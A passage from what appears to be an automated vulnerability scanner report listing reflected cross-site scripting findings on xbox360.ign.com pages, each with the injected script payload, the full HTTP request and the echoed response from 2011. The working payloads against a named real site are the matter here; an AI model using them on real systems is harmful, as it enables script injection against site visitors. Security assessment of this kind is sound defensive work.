        c4:"http://xbox360.ign.com/articles/119/1197270p1.html?9beab"-alert(1)-"049047694c2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.399. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197452p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71d1"><script>alert(1)</script>e228e98d5ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197452p1.html?d71d1"><script>alert(1)</script>e228e98d5ec=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372773v-84n-12mc+1317763372773mv+84mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/119/1197452p1.html?d71d1"><script>alert(1)</script>e228e98d5ec=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.400. http://xbox360.ign.com/articles/119/1197452p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197452p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aee95"-alert(1)-"3fee38ca30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197452p1.html?aee95"-alert(1)-"3fee38ca30=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763378143v-92n-12mc+1317763378143mv+92mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 138041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/119/1197452p1.html?aee95"-alert(1)-"3fee38ca30=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.401. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197622p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26663"-alert(1)-"45b764808de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197622p1.html?26663"-alert(1)-"45b764808de=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763378143v-93n-12mc+1317763378143mv+93mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 136747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/119/1197622p1.html?26663"-alert(1)-"45b764808de=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.402. http://xbox360.ign.com/articles/119/1197622p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197622p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94439"><script>alert(1)</script>b2d17807421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197622p1.html?94439"><script>alert(1)</script>b2d17807421=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763375625v-88n-12mc+1317763375625mv+88mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 131571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/119/1197622p1.html?94439"><script>alert(1)</script>b2d17807421=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.403. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197931p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4ce9"><script>alert(1)</script>345cae4ad5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197931p1.html?b4ce9"><script>alert(1)</script>345cae4ad5e=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-77n-12mc+1317763370104mv+77mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/articles/119/1197931p1.html?b4ce9"><script>alert(1)</script>345cae4ad5e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.404. http://xbox360.ign.com/articles/119/1197931p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197931p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e02"-alert(1)-"94c2ae8eee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197931p1.html?d8e02"-alert(1)-"94c2ae8eee=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372065v-82n-12mc+1317763372065mv+82mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 106824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/119/1197931p1.html?d8e02"-alert(1)-"94c2ae8eee=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.405. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197937p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed8c2"-alert(1)-"978904fffd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /articles/119/1197937p1.html?ed8c2"-alert(1)-"978904fffd2=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763372643v-82n-12mc+1317763372643mv+82mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 99352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
reGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/articles/119/1197937p1.html?ed8c2"-alert(1)-"978904fffd2=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.406. http://xbox360.ign.com/articles/119/1197937p1.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/articles/119/1197937p1.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fe4a"><script>alert(1)</script>78430e4b85a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /articles/119/1197937p1.html?2fe4a"><script>alert(1)</script>78430e4b85a=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:52 GMT
Content-Length: 11299
Connection: close
Set-Cookie: freq=c-1317763372390v-79n-12mc+1317763372390mv+79mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<a href="http://xbox360.ign.com/articles/119/1197937p1.html?2fe4a"><script>alert(1)</script>78430e4b85a=1" class="prestitialText2">
...[SNIP]...

1.407. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0697"-alert(1)-"3ace13c1dc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/features.html?a0697"-alert(1)-"3ace13c1dc7=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-74n-12mc+1317763370104mv+74mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 162563

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Xbox 360 Reviews,
...[SNIP]...
_comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/features.html?a0697"-alert(1)-"3ace13c1dc7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.408. http://xbox360.ign.com/index/features.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a905"><script>alert(1)</script>38d7275c2b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?3a905"><script>alert(1)</script>38d7275c2b2=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366669v-70n-12mc+1317763366669mv+70mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 162625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Xbox 360 Reviews,
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/features.html?3a905"><script>alert(1)</script>38d7275c2b2=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.409. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52988"-alert(1)-"7378184b926 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/games.html?52988"-alert(1)-"7378184b926=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-76n-12mc+1317763370104mv+76mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 194280

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>All Xbox 360 Games
...[SNIP]...
eof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/games.html?52988"-alert(1)-"7378184b926=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.410. http://xbox360.ign.com/index/games.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/games.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1618d"><script>alert(1)</script>df1bad4bef8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/games.html?1618d"><script>alert(1)</script>df1bad4bef8=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763367174v-68n-12mc+1317763367174mv+68mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 194934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>All Xbox 360 Games
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/games.html?1618d"><script>alert(1)</script>df1bad4bef8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.411. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8940"-alert(1)-"ff4c6f3b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/images.html?e8940"-alert(1)-"ff4c6f3b6c=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:51 GMT
Content-Length: 11300
Connection: close
Set-Cookie: freq=c-1317763371901v-79n-12mc+1317763371901mv+79mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
== '') {
docTitle = defaultContinueTo;
}
document.write(docTitle);
}

   function goBackToReferer(){
       document.location.href = "http://xbox360.ign.com/index/images.html?e8940"-alert(1)-"ff4c6f3b6c=1";
return true;

   }
   setTimeout('goBackToReferer()',18000);
</script>
...[SNIP]...

1.412. http://xbox360.ign.com/index/images.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/images.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5654b"><script>alert(1)</script>366148cba72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/images.html?5654b"><script>alert(1)</script>366148cba72=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763366781v-71n-12mc+1317763366781mv+71mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>IGN Xbox 360: Game
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://xbox360.ign.com/index/images.html?5654b"><script>alert(1)</script>366148cba72=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.413. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ccc8"-alert(1)-"2652d4d28f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/latest-updates.html?1ccc8"-alert(1)-"2652d4d28f9=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763370104v-77n-12mc+1317763370104mv+77mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 162810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
coreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://xbox360.ign.com/index/latest-updates.html?1ccc8"-alert(1)-"2652d4d28f9=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.414. http://xbox360.ign.com/index/latest-updates.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/latest-updates.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa85c"><script>alert(1)</script>7b2a90ece9d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/latest-updates.html?aa85c"><script>alert(1)</script>7b2a90ece9d=1 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:50 GMT
Content-Length: 11102
Connection: close
Set-Cookie: freq=c-1317763370127v-73n-12mc+1317763370127mv+73mn+12wwe~0;Path=/;Domain=.ign.com


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" SYSTEM "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"/>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<
...[SNIP]...
<a href="http://xbox360.ign.com/index/latest-updates.html?aa85c"><script>alert(1)</script>7b2a90ece9d=1" class="prestitialText2">
...[SNIP]...

1.415. http://xbox360.ign.com/index/latest-updates.html [types parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://xbox360.ign.com
Path:	/index/latest-updates.html

Issue detail

The value of the types request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4bfc"-alert(1)-"d38b6af0468 was submitted in the types parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /index/latest-updates.html?types=allb4bfc"-alert(1)-"d38b6af0468 HTTP/1.1
Host: xbox360.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:22:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:22:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317763377855v-101n-12mc+1317763377855mv+101mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 135559

